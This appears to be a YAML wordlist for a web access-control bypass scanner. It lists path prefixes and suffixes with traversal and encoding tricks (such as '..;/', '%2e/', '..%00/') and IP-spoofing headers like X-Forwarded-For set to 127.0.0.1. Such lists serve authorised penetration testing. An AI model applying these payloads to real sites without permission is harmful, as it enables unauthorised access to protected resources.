suffix:
    - ".js"
    - ".css"
    - ".json"
    - ".html"
    - ";.css"
    - ";.js"
    - "/."
    - "/"
    - "/./"
    - "%20"
    - "%09"
    - "?"
    - "?error"
    - "#"
    - "/*"
    - "%26"
    - "/images/..;"
    - "/public/..;"
    - ";/"

headers:
    -
      X-Custom-IP-Authorization: 127.0.0.1
      X-Forwarded-For: 127.0.0.1
      X-Client-IP: 127.0.0.1
      X-Remote-Addr: 127.0.0.1
      X-Originating-IP: 127.0.0.1
      Referer: http://127.0.0.1
      X-Real-IP: 127.0.0.1
      Redirect: 127.0.0.1
      Referer: 127.0.0.1
      X-Forwarded-By: 127.0.0.1
      X-Forwarded-Host: 127.0.0.1
      X-Forwarded-Port: 80
      X-True-IP: 127.0.0.1

#    - X-Original-URL: {{Baseurl}}
    - X-Forwarded-For: 127.0.0.1:80
    - X-Forwarded-For: http://127.0.0.1
    - X-Host: 127.0.0.1
#      http/1.0 无头协议绕过
    - HTTP-Version: HTTP/1.0

prefix:
    - "/"
    - ";/"
    - "..;/"
    - "images;/../"
    - "images/..;/"
    - "public/..;/"
    - "%2e/"
    - ";/"
    - "./"
    - "%20/"
    - "%09/"
    - ".;/"
    - "..%00/"
    - "..%0d/"
    - "..%5c/"
    - "#/../"
    - "%23/"
    - "%2f/"
    - "./"
    - "//"
    - ";%09/"
    - ";%09../"
    - ";%09..;/"
    - "..%2f/"
    - ";%2f../"
    - ".html"
    - "?/"
    - "?"
    - "?anything"
    - "#/"
    - "/*/"
    - "/*"
    - ".php"
    - ".json"
    - "..;/"
    - "*/"
